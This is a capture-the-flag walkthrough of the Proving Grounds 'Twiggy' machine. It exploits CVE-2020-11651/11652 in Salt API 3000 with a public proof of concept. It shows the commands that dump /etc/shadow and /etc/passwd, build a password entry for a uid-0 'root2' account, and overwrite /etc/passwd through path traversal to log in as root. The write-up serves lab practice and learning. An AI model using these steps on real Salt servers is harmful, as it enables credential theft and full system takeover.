In this walk through, we will be going through the Twiggy room from Proving Grounds. This room is rated as Easy on the platform and it consist of exploitation of CVE-2020-11652 and CVE-2020-11651 in Salt API 3000 in order to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Twiggy |
IPaddress | 192.168.177.62 |
Difficulty | Easy |
OS | Linux |
Description | Twiggy is an Easy Linux machine that requires exploitation of CVE-2020-11652 and CVE-2020-11651 in Salt API 3000 in order to get root. |
Enumeration:
- I started off my regular nmap aggressive scan and a Full TCP port scan. Found only three ports opened – 22 (SSH) and 80,8000 (HTTP).
$ sudo nmap -A 192.168.177.62 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-16 13:56 IST Nmap scan report for 192.168.177.62 Host is up (0.18s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA) | 256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA) |_ 256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519) | vulners: | cpe:/a:openbsd:openssh:7.4: | EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT* | EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT* | EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT* | EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT* | CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111 | 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328*EXPLOIT* | 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009*EXPLOIT* | SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT* | PRION:CVE-2018-15919 5.0 https://vulners.com/prion/PRION:CVE-2018-15919 | PRION:CVE-2018-15473 5.0 https://vulners.com/prion/PRION:CVE-2018-15473 | PRION:CVE-2017-15906 5.0 https://vulners.com/prion/PRION:CVE-2017-15906 | PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT* | EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT* | EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT* | EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT* | EDB-ID:45233 5.0 https://vulners.com/exploitdb/EDB-ID:45233 *EXPLOIT* | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919 | CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708 | 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730*EXPLOIT* | PRION:CVE-2019-16905 4.4 https://vulners.com/prion/PRION:CVE-2019-16905 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | PRION:CVE-2019-6110 4.0 https://vulners.com/prion/PRION:CVE-2019-6110 | PRION:CVE-2019-6109 4.0 https://vulners.com/prion/PRION:CVE-2019-6109 | CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110 | CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109 | PRION:CVE-2019-6111 2.6 https://vulners.com/prion/PRION:CVE-2019-6111 | PRION:CVE-2018-20685 2.6 https://vulners.com/prion/PRION:CVE-2018-20685 | CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685 | PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT* | MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- 0.0 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT* |_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937*EXPLOIT* 80/tcp open http nginx 1.16.1 |_http-server-header: nginx/1.16.1 |_http-title: Home | Mezzanine 8000/tcp open http nginx 1.16.1 |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: nginx/1.16.1 |_http-title: Site doesn't have a title (application/json). Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%) OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6 Aggressive OS guesses: Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 4.9 (89%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 - 3.16 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.2 - 4.9 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 178.32 ms 192.168.45.1 2 178.29 ms 192.168.45.254 3 178.35 ms 192.168.251.1 4 179.09 ms 192.168.177.62 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 36.77 seconds
sudo nmap -sS -p- -T5 192.168.177.62
- Enumerated the web server running on port 80 and found that it is running the Mezzanine CMS.
- Found a login panel panel however was unable to login into it. Checked around the website’s different functionality found nothing juicy.
- Next, enumerated the web server running on port 8000 and found out that it is running an API endpoint.
- Intercepted the request via Burpsuite to analyze the API better. Seems like it is returning a bunch of client names in JSON data. As per the response tab, we can see that the X-Upstream header is showcasing us the API in use here – Salt-Api/3000-1
Exploitation & Getting root:
- Looked online for any known exploit for the concerned API version and found out that it is vulnerable to two CVEs that leads to Arbitrary Command Execution – CVE-2020-11651 and CVE-2020-11652.
- Used the below exploit on the target in order to dump the contents of the /etc/shadow file via the vulnerable API.
Exploit: https://github.com/jasperla/CVE-2020-11651-poc
python3 exploit.py --master 192.168.177.62 -r /etc/shadow root:$6$WT0RuvyM$WIZ6pBFcP7G4pz/jRYY/LBsdyFGIiP3SLl0p32mysET9sBMeNkDXXq52becLp69Q/Uaiu8H0GxQ31XjA8zImo/:18400:0:99999:7::: bin:*:17834:0:99999:7::: daemon:*:17834:0:99999:7::: adm:*:17834:0:99999:7::: lp:*:17834:0:99999:7::: sync:*:17834:0:99999:7::: shutdown:*:17834:0:99999:7::: halt:*:17834:0:99999:7::: mail:*:17834:0:99999:7::: operator:*:17834:0:99999:7::: games:*:17834:0:99999:7::: ftp:*:17834:0:99999:7::: nobody:*:17834:0:99999:7::: systemd-network:!!:18400:::::: dbus:!!:18400:::::: polkitd:!!:18400:::::: sshd:!!:18400:::::: postfix:!!:18400:::::: chrony:!!:18400:::::: mezz:!!:18400:::::: nginx:!!:18400:::::: named:!!:18400::::::
- We will also dump the contents of the /etc/passwd file as required for the next step of exploitation.
python3 exploit.py --master 192.168.177.62 -r /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:996::/var/lib/chrony:/sbin/nologin mezz:x:997:995::/home/mezz:/bin/false nginx:x:996:994:Nginx web server:/var/lib/nginx:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin
- Used the unshadow utility to generate a single text file containing hashes and users, making it compatible for cracking it with john.
unshadow passwd.txt shadow.txt > hash.txt
- Next, tried to crack the password hashes in the file with john but was unable to to so. So, let’s pivot to a different attack technique.
- We will now generate a password for our new user named root2 which we will then add to the /etc/passwd file.
touch passwd openssl passwd 1234 Wvwt8mKEPPGuw
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:996::/var/lib/chrony:/sbin/nologin mezz:x:997:995::/home/mezz:/bin/false nginx:x:996:994:Nginx web server:/var/lib/nginx:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin root2:Wvwt8mKEPPGuw:0:0:root:/root:/bin/bash
- We will now use the exploit used before to upload our generated /etc/passwd file containing our new root user to the location of the /etc/passwd file of the target host.
python3 exploit.py --master 192.168.177.62 --upload-src passwd --upload-dest ../../../../../../etc/passwd
- Once the exploit execution is complete, we will log into the server via SSH as root2 and captured the root flag to mark the machine as complete.
ssh [email protected] 1234
Also Read: PG – Squid
Conclusion:
So that was “Twiggy” for you. We started off with a regular nmap scan and found 3 ports opened – 22 (SSH) and 80,8000 (HTTP). Enumerated the web server running on port 8000 and found out that it is running an Salt-Api/3000-1 API endpoint. Looked online for any known exploit for the concerned API version and found out that it is vulnerable to two CVEs that leads to Arbitrary Command Execution – CVE-2020-11651 and CVE-2020-11652. Used the same to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.